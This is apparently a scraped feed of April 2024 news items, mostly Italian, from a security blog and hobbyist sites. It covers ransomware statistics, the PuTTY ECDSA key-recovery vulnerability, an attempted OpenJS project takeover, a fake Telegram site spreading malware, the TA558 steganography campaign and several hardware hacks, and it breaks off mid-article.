È rilevante notare che il 61% di tali attacchi proviene esclusivamente dal Dark Web, sottolineando la necessità di monitorare fonti non convenzionali. L’analisi stagionale degli attacchi ha rivelato un picco durante la primavera, con il mese di aprile che ha registrato il maggior numero di offensive, seguito da marzo, novembre, luglio e giugno. Invece, gennaio e febbraio hanno mostrato una minore attività criminale. Il cybercrime ha rappresentato la principale minaccia, costituendo il 93% degli attacchi totali nel 2023. Sebbene le categorie legate a spionaggio e guerra dell’informazione sembrino in diminuzione, l’hacktivism è leggermente aumentato.

Settori come il manifatturiero, il professionale/scientifico/tecnico, l’ICT, il sanitario e il finanziario/assicurativo sono stati tra i più colpiti dagli attacchi. Inoltre, si è osservato un significativo aumento degli attacchi verso il continente americano, che ha rappresentato il 50% degli attacchi totali nel 2023, seguito da Europa, Asia e Africa. Le tecniche più utilizzate dagli attaccanti includono il malware, che ha rappresentato il 70% del totale degli attacchi, seguito dall’utilizzo di vulnerabilità e tecniche sconosciute. Circa un quarto degli attacchi ha avuto impatti critici, mentre il 67% ha causato impatti gravi, indicando un aumento degli attacchi con conseguenze economiche, legali o reputazionali catastrofiche per le vittime. Il Cyber Think Tank di Assintel ha sottolineato l’urgente necessità di rafforzare le misure di sicurezza informatica e promuovere la collaborazione tra pubblico e privato per contrastare efficacemente questa crescente minaccia alla sicurezza digitale.

Rimane una minaccia rilevante il ransomware. Nel primo trimestre del 2023, si è registrato un significativo aumento degli attacchi mirati al furto di dati e alla richiesta di riscatti. Le gang ransomware hanno causato gravi danni economici e reputazionali, con un aumento del 19% nel numero di vittime rispetto al trimestre precedente. In particolare, l’Italia ha visto un aumento dell’85.7% delle vittime rispetto al quarto trimestre del 2022.

Nel secondo trimestre del 2023, il numero di vittime di attacchi ransomware è aumentato del 62% rispetto al trimestre precedente, con le PMI che rappresentano l’80% delle vittime. Le aziende di servizi sono state le più colpite dalle gang ransomware, con il 47% delle vittime. Parallelamente agli attacchi di ransomware, il phishing ha continuato a rappresentare una minaccia significativa per la sicurezza informatica durante tutto l’anno 2023, con attaccanti che utilizzano metodi sempre più sofisticati per ottenere informazioni sensibili.

Nel secondo semestre del 2023, il trend degli attacchi ransomware è proseguito, con un totale di 2.616 vittime registrate in 94 paesi diversi. Le gang ransomware hanno continuato a essere attive, con un totale di 52 gruppi identificati. Gli Stati Uniti sono stati il paese più colpito, seguiti dal Regno Unito, dal Canada, dalla Germania e dall’Italia.

Pierguido Iezzi, CEO di Swascan (Tinexta Cyber) e coordinatore del Cyber Think Tank di Assintel, ha sottolineato la crescente vulnerabilità delle aziende di tutte le dimensioni e l’importanza di adottare un approccio olistico alla difesa informatica, che includa misure preventive e proattive. In un panorama sempre più complesso e minaccioso per le PMI, il ruolo delle associazioni nel settore della Cyber Security diventa cruciale. Il Cyber Think Tank di Assintel si impegna quindi a fornire un supporto più efficace alle PMI nel campo della Cyber Security, ampliando e consolidando l’ecosistema delle Aziende Cyber Assintel.

Inoltre, offre un supporto prezioso alle PMI per gestire i rischi cyber, dalla tecnologia alla conformità legale, mantenendole costantemente aggiornate sulle nuove normative e sulle tecnologie disponibili per migliorare la loro sicurezza informatica. Fa eco a queste parole il Presidente di Assintel, Paola Generali: “L’associazionismo è una leva competitiva cruciale per le PMI, permettendo loro di condividere conoscenze e risorse e di fare fronte comune alle sfide trasversali che le interessano. Inoltre, le associazioni svolgono un ruolo fondamentale nel rappresentare le istanze delle PMI a livello istituzionale e nell’interagire con le autorità competenti”.

In un contesto in cui la cybersecurity diventa sempre più cruciale, l’impegno collettivo diventa essenziale per garantire la sicurezza dei dati e delle infrastrutture digitali.

L'articolo Aumento del 85.7% del fenomeno Ransomware in Italia. Lo riporta il Cyber Think Tank Assintel proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 08:00:32

A ROG Ally Battery Mod You Ought To Try

Today’s hack is an unexpected but appreciated contribution from members of the iFixit crew, published by [Shahram Mokhtari]. This is an ROG Ally Asus-produced handheld gaming console mod that has you upgrade the battery to an aftermarket battery from an Asus laptop to double your battery life (40 Wh to 88 Wh).

There are two main things you need to do: replace the back cover with a 3D printed version that accommodates the new battery, and move the battery wires into the shell of an old connector. No soldering or crimping needed — just take the wires out of the old connector, one by one, and put them into a new connector. Once that is done and you reassemble your handheld, everything just works; the battery is recognized by the OS, can be charged, runs the handheld wonderfully all the same, and the only downside is that your ROG Ally becomes a bit thicker.

The best part is, it’s hard to fail at applying this mod, as it’s documented to the high standards we’d expect from iFixit. The entire journey is split into detailed steps, there’s no shortage of pictures, and the group has also added warnings for the few potentially problematic aspects you want to watch out for. Plus, in the comment section, we’ve learned that there’s an entire community called AllyMods dedicated to ROG Ally modding that has spawned creations like the dual display mod, which is a joy to see!

This mod reminds us of the time someone modified a Nintendo Game Boy Advance SP with a thicker shell too, not just extending the battery, but also adding things like Bluetooth and 3.5 mm audio, USB-C and wireless charging. A worthy upgrade for a beloved device!

Cybersecurity & cyberwarfare

2024-04-17 07:04:44

Gli sviluppatori di PuTTY avvertono di una grave falla di sicurezza. Le chiavi sono compromesse

Gli sviluppatori di PuTTY avvertono di una vulnerabilità critica che colpisce le versioni da 0.68 a 0.80. La falla potrebbe consentire a un utente malintenzionato di recuperare completamente le chiavi private NIST-P521.

La vulnerabilità CVE-2024-31497 si verifica a causa di errori nella generazione di numeri crittografici ECDSA, che consentono il recupero delle chiavi private. La scoperta dell’errore è attribuita ai ricercatori Fabian Bäumer e Markus Brinkmann dell’Università della Ruhr di Bochum

I primi 9 bit di ciascun nonce ECDSA sono zero, consentendo il recupero completo della chiave privata da circa 60 firme utilizzando tecniche all’avanguardia.

Un utente malintenzionato che possiede diverse dozzine di messaggi firmati e una chiave pubblica avrà dati sufficienti per recuperare la chiave privata e falsificare le firme, il che può portare ad un accesso non autorizzato ai server e ai servizi che utilizzano questa chiave.

Il problema ha interessato anche altri prodotti integrati con versioni vulnerabili di PuTTY:

• FileZilla (3.24.1 – 3.66.5);
• WinSCP (5.9.5 – 6.3.2);
• TortoiseGit (2.4.0.2 – 2.15.0);
• TartarugaSVN (1.10.0 – 1.14.6).

In seguito alla divulgazione responsabile, il problema è stato risolto nelle nuove versioni di PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3 e TortoiseGit 2.15.0.1.

Gli sviluppatori del prodotto hanno utilizzato la tecnica RFC 6979 per generare tutti i tipi di chiavi DSA ed ECDSA, abbandonando il metodo precedente. Si consiglia agli utenti TortoiseSVN di utilizzare Plink dall’ultima versione PuTTY 0.81 quando accedono ai repository SVN tramite SSH fino al rilascio dell’aggiornamento.

Le chiavi ECDSA NIST-P521 utilizzate in uno qualsiasi dei componenti interessati devono essere considerate compromesse e immediatamente revocate rimuovendole da “~/.ssh/authorized_keys” e file simili su altri server SSH.

L'articolo Gli sviluppatori di PuTTY avvertono di una grave falla di sicurezza. Le chiavi sono compromesse proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 05:28:58

Il Futuro del Lavoro Secondo Elon Musk: Rivoluzione Tecnologica o Caos Sociale?

L’ultima previsione di Elon Musk sul futuro del lavoro sembra in parti uguali utopica e in qualche modo terrificante. Intervenendo a un vertice sull’intelligenza artificiale nel novembre 2023, l’eccentrico miliardario ha affermato che l’intelligenza artificiale avanzata alla fine sarà in grado di “fare tutto” quando si tratta di lavoro e occupazione.

“Arriverà un punto in cui non sarà più necessario alcun lavoro”, ha detto al primo ministro britannico Rishi Sunak. “Puoi avere un lavoro se vuoi soddisfazione personale, ma l’intelligenza artificiale sarà in grado di fare tutto.”

Per chiunque la cui identità e il cui sostentamento siano legati alla propria carriera, potrebbe essere una pillola difficile da ingoiare. Mentre Musk prevede che l’intelligenza artificiale renderà il lavoro umano facoltativo piuttosto che obbligatorio per la sopravvivenza, insiste che questa automazione della forza lavoro darà vita a quella che definisce “un’era di abbondanza”.

L’idea è che i sistemi di intelligenza artificiale iper-intelligenti agiranno come “geni magici” onniscienti, fornendo tutti i beni, servizi, istruzione di cui potremmo aver bisogno o che desideriamo. Niente più carenze, solo tanto per tutti senza dover lavorare.

Per compensare la crisi occupazionale, Musk sta spingendo qualcosa chiamato “reddito alto universale”. A differenza dei regimi di reddito minimo di base, questo fornirebbe a tutti un sostegno finanziario più generoso e dignitoso, senza fare domande. “Sarà una sorta di pareggio”, ha detto.

Sembra idilliaco in teoria. Ma ovviamente non tutti sono della sua idea. Esperti come Julia Hobsbawm lanciano un allarme. “Temo che il signor Musk sia un utopista irrealistico”, ha condiviso con GOBankingRates. “Come molti nel mondo della tecnologia, sostiene che sostituire gli esseri umani sul posto di lavoro sia inevitabile e auspicabile. Non lo è assolutamente”.

Hobsbawm sostiene che l’attenzione dovrebbe concentrarsi sulla formazione adeguata dei lavoratori per collaborare con i sistemi di intelligenza artificiale, non semplicemente consegnare loro un assegno mentre i robot prendono il sopravvento. “Il lavoro conta nella nostra vita”, insiste.

Quindi “l’era dell’abbondanza” di Musk è un vero scorcio di un futuro basato sull’intelligenza artificiale in cui nessuno dovrà lavorare? Oppure stiamo andando verso una disoccupazione di massa e un collasso sociale? Ad altri esperti piace Alessandra Levit, autore di “Humanity Works”, la quale adotta una visione più misurata.

“Penso che abbia ragione… in un certo senso”, disse Levit. “Probabilmente avremo una forma di reddito di base e l’intelligenza artificiale automatizzerà parte dei posti di lavoro. Ma non accadrà da un giorno all’altro o in modo così estremo come suggerisce Musk”.

Levit prevede che, sebbene l’intelligenza artificiale avrà un impatto enorme su tutti i settori, creerà anche nuove opportunità di lavoro che non possiamo ancora immaginare. “Credo che emergeranno ruoli abbastanza nuovi da far sì che gli esseri umani non smetteranno del tutto di lavorare”.

L'articolo Il Futuro del Lavoro Secondo Elon Musk: Rivoluzione Tecnologica o Caos Sociale? proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 04:41:05

Letta to recommend creation of EU Deep Tech Stock Exchange

Europe's stock market are plagued by problems that prevent deep tech startups from getting the funding they need, Letta wrote.

---

https://www.euractiv.com/section/digital/news/letta-to-recommend-creation-of-eu-deep-tech-stock-exchange/

Cybersecurity & cyberwarfare

2024-04-17 05:02:30

OpenJS nel mirino. Sventata una nuova backdoor simile a XZ Utils

Recentemente gli esperti di sicurezza informatica hanno sventato con successo un tentativo di hackeraggio di un progetto sulla piattaforma OpenJS, che in termini generali è molto simile al recente incidente di backdoor nell’utilità di compressione XZ Utils.

Lunedì 15 aprile la OpenJS Foundation, un’organizzazione no-profit che monitora i progetti JavaScript utilizzati da miliardi di siti in tutto il mondo, ha ricevuto una serie di e-mail sospette. I mittenti hanno chiesto di aggiornare urgentemente uno dei progetti popolari per eliminare le vulnerabilità critiche, senza specificare i dettagli.

Robin Bender Ginn di OpenJS e Omkar Arasaratnam della Open Source Security Foundation hanno riferito che gli autori della lettera hanno insistito per essere nominati nuovi manager di un popolare progetto (nome omesso), nonostante non avessero alcuna precedente esperienza di lavoro su di esso.

Gli esperti hanno notato la somiglianza dei metodi con le azioni dell’hacker di nome Jia Tan, del quale abbiamo parlato recentemente. Era Jia Tang, la cui identità poteva nascondere un’intera squadra di hacker esperti, in precedenza era riuscita a introdurre una backdoor nell’utility XZ Utils.

Ginn e Arasaratnam hanno sottolineato che a nessuno di coloro che hanno presentato domanda è stato concesso un accesso privilegiato al progetto, poiché gli esperti sospettavano subito che qualcosa non andasse.

Secondo Chris Hughes di Endor Labs, circa un quarto di tutti i progetti di sicurezza informatica hanno un manager e il 94% dei progetti ne ha meno di dieci. Ha osservato che l’ecosistema del software open source è estremamente eterogeneo e vulnerabile a causa della dipendenza globale da sviluppatori anonimi.

I funzionari della CISA Jack Cable e Aeva Black hanno espresso la necessità di ripensare gli approcci alla sicurezza nella produzione tecnologica. Sostengono che le aziende che utilizzano software open source dovrebbero contribuire alla sostenibilità dell’ecosistema, anche finanziariamente o attraverso il tempo degli sviluppatori.

Arasaratnam ha anche annunciato i piani della Linux Foundation per sviluppare linee guida specifiche per i project manager che potrebbero dover affrontare aggressivi tentativi di acquisizione. Ha inoltre sottolineato l’importanza di sostenere i manager nella lotta contro l’ingegneria sociale e la manipolazione, che possono potenzialmente portare a conseguenze molto gravi.

L'articolo OpenJS nel mirino. Sventata una nuova backdoor simile a XZ Utils proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 05:00:58

The EU Must Seize its Opportunity to Inspire, Not Regulate, Innovation [Promoted content]

New leadership must determine which policies can help Europe balance sustainability and competitiveness by reaping the benefits of innovation at a time of acute global challenges. The next mandate must ensure technology-driven businesses can thrive in Europe while upholding the Union's fundamental values.

---

https://www.euractiv.com/section/digital/opinion/the-eu-must-seize-its-opportunity-to-inspire-not-regulate-innovation/

Cybersecurity & cyberwarfare

2024-04-17 04:54:51

il misterioso sito cinese che nasconde un pericoloso malware. La nostra indagine

Durante le consuete attività proattive in ambito CTI ed OSINT oggi pomeriggio mi sono imbattuto in uno strano sito in cinese che, in realtà, distribuirebbe malware:

A prima vista il sito sembrerebbe un sito per scaricare la popolare app di messaggistica Telegram che in Cina è bloccata dal governo. Cliccando su Windows è possibile scaricare un archivio .zip da 118MB identificabile mediante il seguente hash:

2b71ecbaad633e07610d4fe45db03062920a44527f3f69d71efb54c571f5b643 – SHA256

Aprendo l’archivio troviamo un file denominato “Taxsex64-2.msi” da 120MB identificabile mediante il seguente hash:

76e9ed21024fd3181f47cbb7870db620ed43dd01c8c77fbcbc3b8eaf47924045 – SHA256

A questo punto ho verificato il dominio utilizzando il noto servizio ThreatYeti:
Il dominio in questione ha ottenuto uno score di 9.08 che è ovviamente molto elevato

Utilizzo di VirusTotal ed altri tools online alla ricerca del malware

Dopo queste prime verifiche non mi rimaneva altro da fare che caricare i due file – sia l’archivio .zip che il file .msi – su VirusTotal:

Questi sono i dettagli del risultato sul file .zip, come possiamo vedere la “First Submission” risulta essere la nostra, questo vuol dire che, a livello mondiale, siamo stati i primi a caricare questo archivio su virustotal e che ora il risultato è a disposizione della community

Anche per ciò che concerne il file .msi siamo stati i primi a caricarlo ed ora i risultati, soprattutto quelli presenti nella sezione “Behavior” relativa all’analisi del file in apposite sandbox sono a disposizione dell’intera community

Inoltre, come ulteriore verifica abbiamo caricato il file .msi anche sullo scanner malware di Jotti:
Come possiamo vedere alle ore 18:24 del 16 Aprile 2024 il file risultava totalmente pulito
Mentre, alle 23:58 del 16 Aprile 2024 qualcosa comincia piano piano a risultare…
Nel pomeriggio del 16 Aprile 2024 abbiamo inviato il file ad Avast utilizzando il loro apposito form online
Inoltre, effettuando una breve verifica mediante l’applicazione “Avast Free Antivirus”, la stessa ha dato esito positivo:
Ora associato al file Taxsex64-2.msi viene rilevato il malware Win64:TrojanX-gen
Ovviamente abbiamo condiviso il file con altre società antivirus(e non solo) e restiamo fiduciosi in attesa delle loro analisi…

Conclusioni

Con questo breve articolo ho voluto illustrare sostanzialmente tre cose:

1. L’importanza dell’attività di ricerca costante, infatti, è vero che nella cybersecurity spesso si gioca in difesa, ma è anche importante andare “a caccia” andando a scovare malware, nuovi gruppi APT e, laddove consentito ed entro i limiti previsti, nuove vulnerabilità in vista della loro full disclosure
2. L’importanza della condivisione, chi si occupa di cybersecurity sa bene che, senza la condivisione della conoscenza e la valorizzazione delle competenze, la cybersecurity stessa rischierebbe di diventare priva di quel valore aggiunto dato dall’attività della community, attività sempre più spesso indispensabile con l’aumentare delle minacce e le loro caratteristiche transnazionali
3. Il ruolo centrale – in caso di malware non rilevato – caratterizzato dall’invio dello stesso alle società antivirus ed a società/enti terzi che si occupano attivamente di malware analysis così da permetterne un’analisi e, in caso di positività, contrastare attivamente la minaccia(proprio com’è successo con l’esempio di Avast contenuto nell’articolo, alle 18:24 il risultato era negativo mentre alle 23:58 il risultato è positivo)

Un ultimo consiglio…

Ora permettetemi di dare un breve consiglio a coloro che si stanno affacciando a questo mondo, probabilmente se un domani andrete ad operare in maniera proattiva, andando quindi a cercare siti che distribuiscono malware o iscrivendo volontariamente la vostra email su risorse di phishing, vi potrà capitare – proprio com’è successo oggi – di essere i primi al mondo a segnalare quel sito di phishing sulle risorse dedicate o quel malware su VirusTotal o alle società di antivirus.

Mentre, se farete bug hunting potrete trovare una vulnerabilità “0day” ed essere i primi a segnalarla al vendor…

Indubbiamente, anche nel mondo della cybersecurity essere i primi a fare qualcosa e la successiva consapevolezza di aver contribuito attivamente a migliorare la community è senza dubbio motivo di gioia ma ricordatevi sempre che anche questo rientra a pieno titolo in quel fantastico mondo che state scoprendo che è la cybersecurity.

L'articolo il misterioso sito cinese che nasconde un pericoloso malware. La nostra indagine proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 05:00:44

Cyberpunk Guitar Strap Lights Up with Repurposed PCBs

Sometimes, whether we like it or not, ordering PCBs results in extra PCBs lying around, either because of board house minimums, mistakes on either end, or both. What’s to be done with these boards? If you’re Hackaday alum [Jeremy Cook], you make a sound-reactive, light-up guitar strap and rock out in cyberpunk style.

The PCBs in question were left over from [Jeremy]’s JC Pro Macro project, and each have four addressable RGB LEDs on board. These were easy enough to chain together with jumper wires, solder, and a decent amount of hot glue. Here’s a hot tip: you can use compressed air to rapidly cool hot glue if you turn the can upside down. Just don’t spray it on your fingers.

The brains of this operation is Adafruit Circuit Playground Express, which runs off of a lipstick battery and conveniently brings a microphone to the table. These two are united by a 3D print, which is hot-glued to the guitar strap along with all the boards. In the second video after the break, there’s a bonus easy-to-make version that uses an RGB LED strip in place of the repurposed PCBs. There’s no solder or even hot glue involved.

Want to really light up the night? Print yourself a sound-reactive LED guitar.

https://www.youtube.com/embed/00ZI6rT8ne8?feature=oembed

https://www.youtube.com/embed/qI9JWv_ScBo?feature=oembed

Cybersecurity & cyberwarfare

2024-04-16 23:00:37

More Microwave Metal Casting

If you think you can’t do investment casting because you don’t have a safe place to melt metal, think again. Metal casting in the kitchen is possible, as demonstrated by this over-the-top bathroom hook repair using a microwave forge.

Now, just because it’s possible doesn’t mean it’s advisable. There are a lot better ways to fix something as mundane as a broken bathroom hook, as [Denny] readily admits in the video below. But he’s been at the whole kitchen forging thing since building his microwave oven forge, which uses a special but easily constructed ceramic heat chamber to hold a silicon carbide crucible. So casting a replacement hook from brass seemed like a nice exercise.

The casting process starts with a 3D-printed model of the missing peg, which gets accessories such as a pouring sprue and a thread-forming screw attached to it with cheese wax. This goes into a 3D-printed mold which is filled with a refractory investment mix of plaster and sand. The green mold is put in an air fryer to dry, then wrapped in aluminum foil to protect it while the PLA is baked out in the microwave. Scrap brass gets its turn in the microwave before being poured into the mold, which is sitting in [Denny]’s vacuum casting rig.

The whole thing is over in seconds, and the results are pretty impressive. The vacuum rig ensures metal fills the mold evenly without voids or gaps. The brass even fills in around the screw, leaving a perfect internal thread. A little polishing and the peg is ready for bathroom duty. Overly complicated? Perhaps, but [Denny] clearly benefits from the practice jobs like this offer, and the look is pretty cool too. Still, we’d probably want to do this in the garage rather than the kitchen.

https://www.youtube.com/embed/hlMfovJ8BvQ?feature=oembed

Cybersecurity & cyberwarfare

2024-04-16 07:41:59

Un ex dipendente di Amazon è stato condannato a 3 anni di prigione per il furto di criptovalute

L’ex dipendente di Amazon e specialista in sicurezza informatica Shakeeb Ahmed è stato condannato a tre anni di prigione per aver violato due scambi di criptovaluta nel 2022, dai quali ha rubato più di 12 milioni di dollari.

Inoltre, dopo il suo rilascio, Ahmed, che in precedenza si era dichiarato colpevole, trascorrerà altri tre anni sotto la supervisione delle autorità, restituendo i 12,3 milioni di dollari rubati e risarcirà entrambe le società colpite.

Secondo il Dipartimento di Giustizia degli Stati Uniti, nel 2022, utilizzando le sue capacità di “reverse engineering di contratti intelligenti e auditing blockchain” Ahmed ha violato l’exchange decentralizzato di criptovalute Nirvana Finance, rubandovi circa 3,5 milioni di dollari, oltre a un exchange senza nome su cui è stato costruito la piattaforma blockchain Solana, rubando più di 9 milioni di dollari.

È interessante notare che nel secondo caso, dopo il furto dei fondi, Ahmed ha contattato la direzione dell’azienda interessata e ha restituito la maggior parte dei fondi, ad eccezione di circa 1,5 milioni di dollari, che ha tenuto per sé come ricompensa per aver scoperto la vulnerabilità.

Anche se il nome della secondo exchange interessato non è stato reso noto, gli esperti sono giunti da tempo alla conclusione e l’idea è che Crema Finance sia stata compromessa. Nel 2022, all’exchange furono effettivamente rubati circa 9 milioni di dollari e pochi giorni dopo la società annunciò che l’hacker aveva accettato di ricevere una “ricompensa” di circa 1,68 milioni di dollari e restituì il patrimonio rimanente.

Ahmed ha provato lo stesso trucco con Nirvana Finance. Ha così approfittato della vulnerabilità del contratto intelligente del protocollo DeFi di Nirvana Finance e ha effettuato un attacco di prestito flash utilizzando token ANA acquistati a basso prezzo. Successivamente ha venduto i token a un prezzo più alto, che gli ha fruttato circa 3,6 milioni di dollari.

L’azienda interessata ha tentato di recuperare le risorse crittografiche rubate offrendo all’hacker una ricompensa di 600.000 dollari. Tuttavia, Ahmed si è rifiutato di restituire i fondi e ha chiesto una ricompensa di 1,4 milioni di dollari. Di conseguenza, la società e l’hacker non sono riusciti a raggiungere un compromesso e, di conseguenza, Nirvana Finance ha tenuto per sé tutto ciò che è stato rubato (ovvero tutti i fondi dello scambio di criptovalute).

Secondo gli investigatori, in seguito agli attacchi hacker, Ahmed ha cercato di nascondere le sue impronte digitali e ha utilizzato diversi mixer di criptovaluta, tra cui blockchain di Samourai Whirlpool, Solana ed Ethereum e scambi esteri, per convertire i milioni rubati in Monero.

L’accusa elenca anche alcune delle perquisizioni di Ahmed dopo gli attacchi. Tra questi c’erano: “suggerimenti su come fuggire dagli Stati Uniti per evitare accuse penali”, “come evitare l’estradizione”, “come conservare la criptovaluta rubata” e “come acquistare la cittadinanza”.

L'articolo Un ex dipendente di Amazon è stato condannato a 3 anni di prigione per il furto di criptovalute proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-16 19:25:19

Speedify VPN Review: Pricing | Security | Performance

In this article, we delve into a detailed review of Speedify VPN, focusing on its pricing model, security features, performance, server network, and user experience. With the VPN market being highly competitive, it’s essential to scrutinize how Speedify stacks up in terms of value, safety, and efficiency. We’ll explore the various subscription options, analyze the […]

Source

Cybersecurity & cyberwarfare

2024-04-17 02:00:19

Still Up and Coming: Non-Planar FDM 3D Printing With 3 or 6 Axes

Printing the non-planar PLA part on top of the non-planar side of the PETG part. (Credit: Michael Wüthrich)
Most of the time FDM 3D printing involves laying down layers of thermoplastics, but the layer lines also form the biggest weakness with parts produced this way. Being able to lay out the lines to follow the part’s contours can theoretically strengthen the part and save material in the process. Recently, [Michael Wüthrich] demonstrated an approach that uses a modified Prusa Mini FDM printer to first lay out a part in PETG using non-planar printing, after which this PETG part was used to print on top of in PLA, effectively using the PETG as an easily removable support and leaving the PLA part as fully non-planar on both sides.

The modification to the Prusa Mini printer is covered on Printables along with the required parts. The main change is to give the nozzle as much clearance as possible, for which [Michael] uses the E3D Revo belt nozzle. This nozzle requires a custom holder for the Prusa Mini. After this the printer is ready for non-planar printing, but as [Michael] notes in the Twitter thread, he did not use a slicer for this, as none exists. Instead he used Matlab, a custom script and a lot of manual labor.

Non-planar FDM printing has been covered by us before, along with the need for slicers which can handle such more ‘exotic’ tasks. Hopefully with efforts like this by [Michael] such a future may be a bit closer now. If the waiting for this takes too long, or 3 axis printers seem a bit old-school, we were reminded via a tip by [Keith Olson] that it’s always possible to double the number of axes for more freedom, as in this video demonstration by [Fergal Coulter] (also embedded below), of a 6-axis 3D printer which also prints on top of an existing substrate.

https://www.youtube.com/embed/MrBOTG9cAJ8?feature=oembed

Cybersecurity & cyberwarfare

2024-04-16 18:30:32

The Next Evolution Of The Raspberry Pi Recovery Kit

At Hackaday, the projects we cover are generally a one-off sort of thing. Somebody makes something, they post it online, we share it with our audience — rinse and repeat. If a project really captures people’s imaginations, it might even inspire a copy or two, which is gratifying for everyone involved. But on the rarest of occasions, we run across a project like [Jay Doscher]’s Recovery Kit.

To say that the Recovery Kit was an inspiration to others would be putting it mildly. Revolutionary would be more like it, as it resulted in more “Pi-in-a-Pelican” builds than we could possibly count. So it’s only natural that [Jay] would return to the well and produce a second version of his heavy-duty cyberdeck.

Now, technically, there have been a few other variants of the original Recovery Kit since its release in 2019, such as the easier-to-build Quick Kit. If you want to get really technical, even the Recovery Kit is actually a do-over of sorts from his original Raspberry Pi Field Unit from 2015. But [Jay] says none of the minor refreshes or revisions he’s worked on were never substantial enough to get the official “Version 2” stamp before this one.

So, what’s changed in this new version? For one thing, it’s been optimized for reproduction by others. All the pain points that folks reported while building their own Recovery Kits have been addressed, from the time it takes to print the parts to the availability of key off-the-shelf components. Not only are the parts easier to get your hands on, but they’re also easier to assemble, with the soldered links of the original now replaced with push-on connectors.

Designed around the Raspberry Pi 5, the new Recovery Kit has also received a considerable performance boost over the previous versions. This is further extended by using a bootable NVME drive rather than the dinky SD cards most Pi builds are stuck with. Despite the computational kick in the pants, [Jay] says he’s realized that the relatively low resolutions available for the type of displays that can be crammed into a build like this are pretty poor for most graphical environments and recommends the user stick to the terminal.

In addition to the lengthy write-up about the design process behind the Recovery Kit Version Two, [Jay] has provided a comprehensive parts list with links to where you can pick up your own hardware. Having been burned by hard-to-source components in the past, this time, most of the hardware is from either Amazon or McMaster-Carr.

All in all, it’s a solid refinement of an already very well-engineered design. The only thing left now is to see if this new revision of the Recovery Kit can have the same impact on the community as its predecessor. No pressure.

Cybersecurity & cyberwarfare

2024-04-16 14:36:23

Uno 0day Zero Click consente il controllo degli iPhone al prezzo di 2 milioni di dollari

Trust Wallet ha invitato gli utenti Apple a disabilitare iMessage a causa delle informazioni su una vulnerabilità critica zero-day che consente agli hacker di prendere il controllo degli smartphone.

Secondo Trust Wallet, la vulnerabilità consente a un utente malintenzionato di penetrare nel sistema e controllare il dispositivo. Non richiede nemmeno che l’utente faccia clic sul collegamento (Zero Click).

La vulnerabilità è particolarmente pericolosa per i titolari di conti con una quantità significativa di fondi sul proprio conto. Tutti i portafogli crittografici sugli iPhone con iMessage sono soggetti a rischio.
Tweet di Trust Wallet sul difetto di iMessage (tradotto)
La direttrice di Trust Wallet, Eowyn Chen, ha condiviso uno screenshot che secondo lei mostra un exploit venduto per 2 milioni di dollari sul dark web.
Il post di Eowyn Chen sull’exploit
Tuttavia, la comunità cripto era scettica riguardo al messaggio di Chen.

I crittoanalisti hanno affermato che le informazioni basate su uno screenshot non possono essere attendibili senza fornire prove. Inoltre, un simile avvertimento può causare panico. Nelle prime 4 ore dopo la pubblicazione, l’avviso di Trust Wallet è stato visualizzato da oltre 1,2 milioni di utenti.

Dopo un’ondata di dubbi da parte degli esperti, Trust Wallet ha scritto che le informazioni sulla vulnerabilità zero-day sono state ricevute dal team di sicurezza e dai partner che monitorano costantemente le minacce.

MetaRyuk, ricercatore di Web3 e metaverse, ha affermato che il sito elenca solo il prezzo dell’exploit, senza una demo o una conferma di autenticità. Inoltre, il sito stesso non ha alcuna reputazione nel dark web e potrebbe rivelarsi una truffa, proprio come altri siti simili. Lo specialista ha sottolineato che in questa fase non ci sono abbastanza dettagli per valutare il livello di fiducia nella proposta.

Apple non ha fornito alcun commento sulla situazione.

L'articolo Uno 0day Zero Click consente il controllo degli iPhone al prezzo di 2 milioni di dollari proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-16 13:32:46

Malware dentro le immagini. Scopriamo la Steganografia nella campagna SteganoAmor

La nuova campagna del gruppo di hacker TA558 si chiama SteganoAmor, poiché gli hacker utilizzano la steganografia e nascondono codice dannoso all’interno delle immagini. Gli specialisti di Positive Technologies riferiscono che il gruppo utilizza lunghe catene di attacco che includono vari strumenti e malware, tra cui: Agent Tesla, FormBook, Remcos, Lokibot, Guloader, SnakeKeylogger, XWorm, NjRAT, EkipaRAT.

Gli esperti di Positive Technologies hanno scoperto attacchi in tutto il mondo associati al gruppo TA558. Come inizialmente descritto dai ricercatori di ProofPoint, TA558 è un piccolo gruppo che dal 2018 prende di mira le organizzazioni del settore alberghiero e del turismo principalmente in America Latina, ma è stato visto prendere di mira anche la regione del Nord America e l’Europa occidentale.

Negli attacchi ora analizzati, il ​​gruppo ha utilizzato attivamente la steganografia: file di payload (sotto forma di script VBS e PowerShell, documenti RTF con un exploit integrato) venivano trasmessi all’interno di immagini e file di testo.

I ricercatori hanno notato che la maggior parte dei documenti RTF e degli script VB avevano nomi come greatloverstory.vbs, easytolove.vbs, iaminlovewithsomeoneshecuteandtrulyyoungunluckyshenotundersatnd_howmuchiloveherbutitsallgreatwithtrueloveriamgivingyou.doc. Cioè erano associati alla parola “love”, quindi l’operazione si chiamava SteganoAmor.

In genere, gli attacchi TA558 iniziano con e-mail dannose contenenti allegati apparentemente innocui (file Excel e Word). Questi documenti sfruttano la vulnerabilità CVE-2017-11882, che è stata corretta nel 2017.

In particolare, le e-mail vengono inviate da server SMTP compromessi per ridurre al minimo la probabilità che vengano bloccati i messaggi che provengono da domini legittimi.

Se la vittima ha installato una versione precedente di Microsoft Office, l’exploit scaricherà uno script VBS da un servizio paste[.]ee legittimo, che verrà eseguito per produrre un file immagine (JPG) contenente un payload codificato base64.
Immagine utilizzata in attacco
Il payload codificato base64 per la fase successiva dell’attacco contiene un comando PowerShell all’interno dello script.

Successivamente, lo script decodifica il caricamento dall’immagine e scarica il payload aggiuntivo dallo stesso URL, che viene scritto in formato stringa inversa (ovvero viceversa). Si noti che il contenuto è anche un file eseguibile codificato in base64, ma invertito.
Codice dannoso all’interno di un file di testo
Nel loro rapporto gli esperti sottolineano che a volte TA558 utilizza diverse catene di attacchi anche per lo stesso malware, per non parlare di malware diversi. E gli hacker utilizzano malware come Agent Tesla, Remcos, XWorm, LokiBot, GuLoader, FormBook e Snake Keylogger.

